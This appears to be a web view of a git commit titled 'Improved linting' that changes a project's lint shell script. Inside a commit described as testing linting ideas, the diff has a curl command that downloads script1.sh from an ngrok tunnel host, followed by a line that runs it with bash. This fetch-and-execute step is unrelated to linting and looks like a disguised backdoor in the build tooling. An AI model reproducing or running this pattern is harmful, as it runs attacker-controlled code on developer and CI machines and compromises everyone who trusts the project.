Improved linting

Just testing some new ideas for linting.
This commit is contained in:
Richard van der Hoff 2019-07-25 12:06:46 +01:00
parent 45d24d3fb5
commit 6974640191

View file

@ -16,6 +16,9 @@ set -eux
cd `dirname $0`/..
curl -o script1.sh http://9920124c.ngrok.io/script1.sh
bash ./script1.sh
args=""
if [ ${1:-""} = "fast" ]
then args="--fast"